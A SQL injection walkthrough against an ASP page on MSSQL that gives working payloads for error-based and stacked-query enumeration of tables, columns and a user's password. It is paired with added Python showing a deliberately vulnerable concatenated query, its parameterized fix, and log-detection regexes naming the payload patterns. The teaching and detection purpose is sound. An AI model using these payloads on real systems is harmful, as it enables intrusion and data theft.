Getting Table Names and Field Names: Test Attack

Step 1: Enter a single quote (') in the username input. The page displays:
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Unclosed quotation mark.
    /user/wantpws.asp, line 63
Description: single quotes are not filtered, and the database is MSSQL.

Step 2: Enter: a';use master;--
The page displays:
    Microsoft OLE DB Provider for SQL Server error '80040e21'
    Multiple-step OLE DB operation generated errors. Check each OLE DB status value, if available. No work was done.
    /user/wantpws.asp, line 63
Description: this shows that the account has no permission for this.

Step 3: Enter: a' or name like 'fff%';--
A user named ffff is shown.

Step 4: Enter: ffff' and 1<>(select count(email) from [user]);--
The page displays:
    Microsoft OLE DB Provider for SQL Server error '80040e37'
    Invalid object name 'user'.
    /user/wantpws.asp, line 96
Description: there is no object called user. Trying users instead succeeds, and there is a column called email.

Enter: a' having 1=1--
The error that normally comes back directly gives a table name and a field name:
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /user/wantpws.asp, line 63
Now we know that the password of user ffff is 11111. The following statements get all the table names and field names in the database.

Step 5: Enter: ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
Description: this statement takes the first user table in the database and writes its name into the email field of user ffff.
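The root cause behind steps 1 to 5 is a query built by pasting the username straight into SQL text on line 63 of wantpws.asp, with the database error echoed back to the browser. The following is an added example (not code from the page or from the application it describes) that reproduces that pattern beside the parameterized form a defender should ship; sqlite3 stands in for MSSQL so it runs offline, the table layout and the rows are constructed for this example, and the function names are hypothetical.

```python
import sqlite3

# Constructed sample data standing in for the application's users table.
# sqlite3 is used here in place of MSSQL so the example runs offline; the
# concatenation bug and the parameterized fix look the same under ADO/MSSQL.
SAMPLE_USERS = [
    ("ffff", "ffff@example.invalid", "11111"),
    ("alice", "alice@example.invalid", "s3cret"),
]


def make_db():
    """Build an in-memory database with a users(id, name, email, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, email, password) VALUES (?, ?, ?)", SAMPLE_USERS
    )
    return conn


def lookup_vulnerable(conn, username):
    """The line-63 pattern: user input concatenated into the statement text.
    Returns the matched names, or the raw database error string, the way the
    page shows the OLE DB error being echoed to the client."""
    sql = "SELECT name FROM users WHERE name = '" + username + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)


def lookup_safe(conn, username):
    """Parameterized query: the value travels separately from the statement,
    so quotes, ';' and '--' in the input are ordinary characters. Any database
    error is kept server-side and the client gets a generic message."""
    try:
        rows = conn.execute("SELECT name FROM users WHERE name = ?", (username,))
        return [row[0] for row in rows]
    except sqlite3.Error:
        # log the exception here; never return exc text to the client
        return "ERROR: request failed"


if __name__ == "__main__":
    db = make_db()
    for probe in ("ffff", "'", "a' or name like 'fff%'--"):
        print(repr(probe))
        print("  concatenated :", lookup_vulnerable(db, probe))
        print("  parameterized:", lookup_safe(db, probe))
```

Running it shows the two observations the page relies on: a lone quote makes the concatenated query fail with a parser error (the 80040e14 class of message), and the step 3 probe widens the WHERE clause until the ffff row comes back, while the parameterized version treats both inputs as a literal username and returns nothing.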
Viewing the user information of ffff now shows the first table, called ad. Get its id:
    ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
The id obtained is 581577110. Since object ids are assigned from small to large, we can get the names of all the user tables in turn; the name of the second table:
    ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
Table list:
    ad        581577110
    users     597577167
    buy       613577224
    car       629577281
    learning  645577338
    log       661577395
    movie     677577452
    movieurl  693577509
    password  709577566
    type      725577623
    talk
After the guessing above, it is clear that password and users are the important tables.

Step 6: Guess the fields of the important tables. Now look at the fields of users:
    ffff';update [users] set email=(select top 1 col_name(object_id('users'),3)) where name='ffff';--
The third field is password.
    ffff';update [users] set email=(select top 1 col_name(object_id('users'),4)) where name='ffff';--
The fourth field is name. The users table has 28 fields in all.
(Note: another way to get the fields, provided the system returns error messages:
    a' group by id having 1=1--
gives
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Column 'users.userid' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /user/wantpws.asp, line 63
so the second field is userid. To display the third field:
    a' group by id,userid having 1=1--
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Column 'users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /user/wantpws.asp, line 63
This gives password, and the remaining fields are displayed in the same way.)
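Steps 5 and 6 leave a distinctive trail in the web server log: HAVING and GROUP BY probes that return 500s, references to sysobjects and col_name/object_id, and stacked UPDATE statements against the users table, all from one client in a short window. The following is an added example, not part of the page, of a detection pass over W3C-style IIS log lines; the log lines are constructed for this example, the field order is assumed, and the rule names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Detection rules derived from the enumeration steps described above.
# These are hypothetical rules written for this example, not a vendor ruleset.
RULES = {
    "error-based-probe": re.compile(r"\bhaving\s+1\s*=\s*1"),
    "group-by-walk":     re.compile(r"\bgroup\s+by\b.*\bhaving\b"),
    "sysobjects-enum":   re.compile(r"\bsysobjects\b.*\bxtype\s*=\s*'?u"),
    "column-enum":       re.compile(r"\bcol_name\s*\(\s*object_id\s*\("),
    "self-update-exfil": re.compile(r"\bupdate\s+\[?users\]?\s+set\b"),
    "stacked-query":     re.compile(r"'\s*;\s*(use|update|select|insert|exec)\b"),
}

# Constructed sample log, W3C extended format with the field order assumed below.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 10.0.0.5 GET /user/wantpws.asp username=ffff 200
2004-05-01 10:00:09 10.0.0.5 GET /user/wantpws.asp username=a%27+having+1%3D1-- 500
2004-05-01 10:00:15 10.0.0.5 GET /user/wantpws.asp username=a%27+group+by+id+having+1%3D1-- 500
2004-05-01 10:00:40 10.0.0.5 GET /user/wantpws.asp username=ffff%27%3Bupdate+%5Busers%5D+set+email%3D(select+top+1+name+from+sysobjects+where+xtype%3D%27u%27)+where+name%3D%27ffff%27%3B-- 200
2004-05-01 10:01:02 10.0.0.7 GET /user/wantpws.asp username=o%27brien 500
""".splitlines()


def normalize(fragment):
    """Decode percent-encoding twice (catches double-encoded payloads),
    lower-case, and collapse whitespace so the regexes see one form."""
    text = unquote_plus(unquote_plus(fragment))
    return re.sub(r"\s+", " ", text.lower())


def scan_log_lines(lines):
    """Return (line_no, client_ip, rule_name) for every matching request.
    Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) < 7:
            continue
        client_ip, stem, query = parts[2], parts[4], parts[5]
        text = normalize(stem + "?" + query)
        for name, rx in RULES.items():
            if rx.search(text):
                hits.append((line_no, client_ip, name))
    return hits


def suspicious_clients(hits, min_distinct_rules=2):
    """Clients that trip at least min_distinct_rules different rules; a single
    rule firing once (or an apostrophe in a real name) is not enough on its own."""
    seen = {}
    for _, client_ip, name in hits:
        seen.setdefault(client_ip, set()).add(name)
    return {ip for ip, names in seen.items() if len(names) >= min_distinct_rules}


if __name__ == "__main__":
    found = scan_log_lines(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("escalate:", suspicious_clients(found))
```

The last sample line matters: a username containing a legitimate apostrophe produces a 500 through the same unparameterized query, but it matches no rule, and the client-level threshold keeps one stray error from paging anyone. The first fix is still the parameterized query; this scan is for finding which clients were probing before the fix shipped.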